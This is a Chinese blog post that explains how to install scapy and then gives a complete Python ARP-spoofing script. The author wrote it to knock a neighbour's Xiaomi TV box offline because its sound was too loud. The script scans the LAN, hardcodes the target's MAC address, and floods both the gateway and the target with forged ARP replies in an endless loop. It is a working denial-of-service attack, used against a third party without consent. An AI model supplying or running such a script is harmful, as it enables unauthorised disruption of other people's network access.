不久前才知道scapy这个工具,相见恨晚。其强大在于可以修改数据包,基于python,使用更加方便。
真正开始研究TCP/IP是在半年前,本人不才,拿着FreeRTOS-TCP/IP源码看了个把月,仍然迷茫,好在TCP/IP协议部分明白了很多。
一个月前接触Python,目前正在慢慢熟悉。
Ubuntu14.04安装scapy
由于我的系统已安装Python2.7,但是没有安装pip,这里首先安装pip
1 sudo apt-get install python-pip如果失败的话可以尝试如下一句
1 sudo apt-get update --fix-missingpip安装完成之后,安装scapy
sudo pip install scapy至此,scapy安装完成,如下可以测试以下
vmuser@linux-host:~/桌面$ python Python 2.7.3 (default, Oct 26 2016, 21:04:23) [GCC 4.6.3] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> from scapy.all import * >>> a = IP() >>> a <IP |> >>> get_if_hwaddr("eth0") '00:0c:29:70:b1:85' >>>eth0是我的网卡。
Python3.6
pip install scapy或者是
pip3 install scapy-python3ARP ATTACK EXAMPLE (1)
硬件平台: Dragon Board 410C
系统: Debian
python: 2.7
一人在外租房,免不了邻里间相互打扰,近期有房客看电视且声音不小,正好手边有一开发板,计划用scapy发起ARP攻击来使其掉线。
ARP攻击的原理略谈一下,基本就是伪造报文,污染主机或网关的arp缓存表,复杂一些的就要佯装网关,中间攻击。限于本人水平,怎么简单怎么来吧。
首先要知道对方是一个什么样的设备,使用局域网扫描工具,扫描活动主机,然后根据其MAC来定位到底是哪一个MAC地址,扫描结果如下:
C8-3A-35-C0-05-15 Tenda Technology Co., Ltd. 04-E6-76-46-A6-F3 AMPAK Technology, Inc. 78-02-F8-34-4D-B5 私营 24-09-95-95-E2-02 HUAWEI TECHNOLOGIES CO.,LTD 20-47-47-BA-99-1E Dell Inc. 70-14-A6-37-3F-0F Apple, Inc. E8-B4-C8-7B-F3-0F Samsung Electronics Co.,Ltd 48-3B-38-D9-8D-D8 Apple, Inc.其中“AMPAK”最可疑,百度一番后,鉴定为小米盒子。(题外话:AMPAK被多次发现做IP扫描。。。。)
锁定MAC之后,我猜他们(一对老夫妇,天天看电视,うるさい!!)是逃不了了
1 #!/usr/bin/env python 2 # _*_ coding=utf-8 _*_ 3 4 from scapy.all import * 5 import time 6 import random 7 #------------------------------------------------------- 8 def GetSubNet(OurIP): 9 ''' 10 获取子网,192.168.0 11 ''' 12 Index = 0 13 SubString = "" 14 while True: 15 num = OurIP.find('.',Index) 16 if num != -1: 17 Index = num + 1 18 if num == -1: 19 SubString = OurIP[:Index] 20 break 21 return SubString 22 #------------------------------------------------------- 23 def GetMac(tgtIP): 24 ''' 25 获取目标IP的MAC地址。 26 tgtIP:目标IP地址 27 ''' 28 try: 29 tgtMac = getmacbyip(tgtIP) 30 return tgtMac 31 except: 32 print (tgtIP,"请检查目标IP是否存活") 33 #------------------------------------------------------- 34 def GetBrocastIP(OurIP): 35 ''' 36 获取局域网广播地址 37 OurIP :我们的IP地址 38 ''' 39 return GetSubNet(OurIP) + "255" 40 #------------------------------------------------------- 41 def GetForgetIP(OurIP,Num): 42 ''' 43 伪造IP地址 44 OurIP:我们自己的IP 45 Num:要伪造多少个IP地址 46 ''' 47 SubString = GetSubNet(OurIP) 48 #伪造IP 49 ForgetIP = [] 50 i = 0 51 while i < Num: 52 num = int(random.uniform(0,255)) 53 TempIP = SubString + "%d"%num 54 if TempIP == OurIP: 55 continue 56 else: 57 ForgetIP.append(TempIP) 58 i = i + 1 59 return ForgetIP 60 #------------------------------------------------------- 61 def GetForgeMac(OurMac,Num): 62 ''' 63 生成随机MAC地址 64 OurMac:我们自己的MAC地址,不能跟自己重复啊 65 ''' 66 ForgeMac = [] 67 j = 0 68 while j < Num: 69 while True: 70 i = 0 71 TempMac = "" 72 while i < 6: 73 num = int(random.uniform(0,255)) 74 TempMac = TempMac + "%02X"%num 75 if i <= 4:TempMac = TempMac + ":" 76 i = i + 1 77 if TempMac == OurMac: 78 pass 79 else: 80 ForgeMac.append(TempMac) 81 j = j + 1 82 break 83 return ForgeMac 84 #------------------------------------------------------- 85 def AttackMac(Mac,face,Num,Interval,GW_IP): 86 ''' 87 攻击MAC 88 Mac:要攻击的MAC地址 89 face:发送攻击报文的网络接口 90 GW:是否只攻击网关 91 ''' 92 Broadcast_mac = "FF:FF:FF:FF:FF:FF" 93 GW_MAC = "" 94 try: 95 OurIP = get_if_addr(face) 96 if GW_IP != "":GW_MAC = GetMac(GW_IP) 97 except: 98 OurIP = "192.168.0.105" 99 return 100 Broadcast_ip = GetBrocastIP(OurIP) 101 while True: 102 ForgeIP = GetForgetIP(OurIP,Num) 103 #生成数据包 104 if GW_IP != "": 105 #攻击网关 106 pkt = Ether(dst = GW_MAC,src = Mac)/\ 107 ARP(psrc = ForgeIP,pdst = GW_IP,\ 108 hwsrc = Mac,hwdst = GW_MAC,op = 2) 109 else: 110 #攻击全网 111 pkt = Ether(dst = Broadcast_mac,src = Mac)/\ 112 ARP(psrc = ForgeIP,pdst = Broadcast_ip,\ 113 hwsrc = Mac,op = 1) 114 #发送数据包 115 try: 116 #print(ls(pkt)) 117 #input() 118 sendp(pkt,iface = face) 119 except: 120 print("!!Send Error!!") 121 break 122 time.sleep(float(Interval)) 123 #------------------------------------------------------- 124 def AttackIP(tgtIP,face,Num,Interval,GW_IP): 125 ''' 126 攻击IP地址 127 tgtIP:目标IP 128 face:网卡接口 129 Num:攻击报文数目 130 Interval:攻击间隔 131 ''' 132 #广播地址 133 GW_MAC = "" 134 Broadcast_mac = "FF:FF:FF:FF:FF:FF" 135 #本地 136 try: 137 OurMac = get_if_hwaddr(face) 138 OurIP = get_if_addr(face) 139 if GW_IP != "":GW_MAC = GetMac(GW_IP) 140 except: 141 OurMac = "00:00:00:00:00:00" 142 OurIP = "192.168.0.105" 143 Broadcast_ip = GetBrocastIP(OurIP) 144 while True: 145 #准备数据包 146 ForgeMac = GetForgeMac(OurMac,Num) 147 if GW_IP != "": 148 #攻击网关 149 pkt = Ether(dst = GW_MAC,src = ForgeMac)/\ 150 ARP(psrc = tgtIP,pdst = GW_IP,\ 151 hwsrc = ForgeMac,hwdst = GW_MAC,op = 2) 152 else: 153 #攻击全网 154 pkt = Ether(dst = Broadcast_mac,src = ForgeMac)/\ 155 ARP(psrc = tgtIP,pdst = Broadcast_ip,\ 156 hwsrc = ForgeMac,op = 1) 157 #发送数据包 158 try: 159 sendp(pkt,iface = face) 160 except: 161 print("!!Send Error!!") 162 break 163 #延迟 164 time.sleep(float(Interval)) 165 #------------------------------------------------------- 166 Table = {} 167 def Scanf(OurIP,Start,End): 168 ''' 169 扫描网络,获取IP-MAC并保存 170 OurIP:我们的IP地址 171 Start:扫描起始地址 172 End:扫描结束地址 173 例如:OurIP = 192.168.0.105,Start = 99,End = 150 174 扫描IP范围:192.168.0.99 ~ 192.168.0.150 175 ''' 176 SubString = GetSubNet(OurIP) 177 for num in range(Start,End): 178 ip = SubString+str(num) 179 arpPkt = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip, hwdst="ff:ff:ff:ff:ff:ff") 180 res = srp1(arpPkt, timeout = 1, verbose=0) 181 if res: 182 Table[res.psrc] = res.hwsrc 183 return Table 184 #------------------------------------------------------- 185 def GetIpByMac(Mac): 186 if len(Table) == 0:return None 187 return Table.get(Mac) 188 189 def Attack_xiaomi(Face,PackNum,Counter,Interval): 190 ''' 191 攻击小米盒子 192 Face:网卡接口 193 PackNum:数据包数目 194 Counter:攻击次数(-1:无限次) 195 Interval:攻击间隔 196 例如:Face="wlan0",PackNum=10,Counter=-1,Interval=1 197 ''' 198 MY_ip = get_if_addr(Face) 199 MY_mac = get_if_hwaddr(Face) 200 if MY_ip == None or MY_mac == None:return 201 202 GW_ip = "192.168.0.1" 203 GW_mac = GetMac(GW_ip) 204 if GW_mac == None:return 205 206 Scanf(MY_ip,99,150) 207 208 XM_mac = "04:E6:76:46:A6:F3" 209 XM_ip = GetIpByMac(XM_mac) 210 if XM_ip == None:return 211 212 while True: 213 #Attack packs 214 Temp_mac = GetForgeMac(MY_mac,PackNum) 215 Temp_ip = GetForgetIP(MY_ip,PackNum) 216 217 PKT_2_XM_4_mac = Ether(src = GW_mac,dst = XM_mac)/ARP(psrc = Temp_ip,pdst = XM_ip,op = 2) 218 PKT_2_XM_4_ip = Ether(src = Temp_mac,dst = XM_mac)/ARP(psrc = GW_ip,pdst = XM_ip,op = 2) 219 PKT_2_GW_4_XM_mac = Ether(src = XM_mac,dst = GW_mac)/ARP(psrc = Temp_ip,pdst = GW_ip,op = 2) 220 PKT_2_GW_4_XM_ip = Ether(src = Temp_mac,dst = GW_mac)/ARP(psrc = XM_ip,pdst = GW_ip,op = 2) 221 try: 222 sendp(PKT_2_XM_4_mac,iface = Face) 223 time.sleep(0.5) 224 sendp(PKT_2_XM_4_ip,iface = Face) 225 time.sleep(0.5) 226 sendp(PKT_2_GW_4_XM_mac,iface = Face) 227 time.sleep(0.5) 228 sendp(PKT_2_GW_4_XM_ip,iface = Face) 229 except: 230 print("!!Send Error!!") 231 #sleep 232 num = int(random.uniform(0,Interval)) 233 time.sleep(num) 234 if Counter == -1: 235 pass 236 else: 237 Counter = Counter - 1 238 if Counter == 0: 239 return 240 241 if __name__ == "__main__": 242 #while True: 243 #AttackIP("192.168.0.108","wlan0",10,60,"192.168.0.1") 244 #AttackMac(Mac,face,Num,Interval,GW_IP): 245 #AttackMac("C8:3A:35:C0:05:15","wlan0",2,2,"192.168.0.108") 246 while True: 247 Attack_xiaomi("wlan0",20,30,5)